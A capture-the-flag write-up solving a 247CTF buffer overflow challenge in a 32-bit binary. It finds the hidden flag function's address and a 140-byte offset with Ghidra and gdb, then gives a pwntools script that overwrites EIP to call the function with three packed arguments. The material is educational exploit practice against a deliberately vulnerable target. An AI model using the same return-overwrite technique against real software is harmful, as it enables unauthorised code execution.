Hidden Flag Function with Parameters - Buffer Overflow

![6e6bfa535b863692b8813994ce5fcb03.png](0153c2791a3845058c6d96370cf5b235.png) We need to call the hidden `flag` function and pass it some parameters. I used ghidra to take a look at the function ![a667f64a9ae418de64ec7be7c49d5f17.png](5cdd2f4781174688b94c23f8dca312b6.png) So we need to pass it `0x1337`, `0x247`, and `0x12345678` Let's find the function using `gdb` `info func` ![03b462ec387899400230b91290c24296.png](93de95d5d266449290c77ede45b99d29.png) The function is at `0x08048576` Now let's find the offset `pattern create 200` Pass the pattern to the program ![b5a7d835eec89459242c6eec7b3d7837.png](82d6c47046604bf8ab7005d522ec59fa.png) We got the segfault at `0x6261616b`, let's use `pattern search` to find the offset ![35f868eb885d113a1007cbeec300699c.png](3433d02b780a45d4a61862038b7b680c.png) Okay, so now we know the offset. Let's test to make sure we can control `EIP` `pi print('A'*140 + 'B'*4)` Passing that to the program we see we get a segfault at `0x424242`. Perfect. We control `EIP` ![5fd9af10a99dcef0894c78b596c2acee.png](b87c64c10cb546b6ab18bb3d7dc5c7e2.png) Let's build our payload. The structure of our payload is as follows: `padding + flagfunc + 4 bytes for a return address + param1 + param2 + param3` 1. Padding 1. 'A' * 140, we found this earlier 2. Flag Function Address 1. p32(0x08048576) - Packing the address in little endian format using pwntools 3. Four bytes for a return address 1. 'B' * 4, you can use whatever. It doesn't matter, just needs to be four bytes 4. Parameter 1 1. p32(0x1337) - First parameter that needs to be passed, packed in little endian format using pwntools 5. Parameter 2 1. p32(0x247) - Second parameter that needs to be passed, packed in little endian format using pwntools 6. Parameter 3 1. p32(0x12345678) - Third parameter that needs to be passed, packed in little endian format using pwntools My solve script: ```Python #import pwntools from pwn import * #create the process p = process('./hidden_flag_function_with_args') #attach it to gdb gdb.attach(p) #create the connection #p = remote('458b4cea0dae8dff.247ctf.com', 50078) #payload variables padding = b'A' * 140 param3 = p32(0x12345678) param2 = p32(0x247) param1 = p32(0x1337) funcloc = p32(0x08048576) #payload payload = padding + funcloc + b'B'*4 + param1 + param2 + param3 #recieves the data the program spits out up to 'though:' print(p.recvuntil('though:')) #recieves the newline character p.recvline() #sends the payload p.sendline(payload) #recieves the flag print(p.recvall()) ``` --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #exploit_development #buffer_overflow #scripting #pwn Related: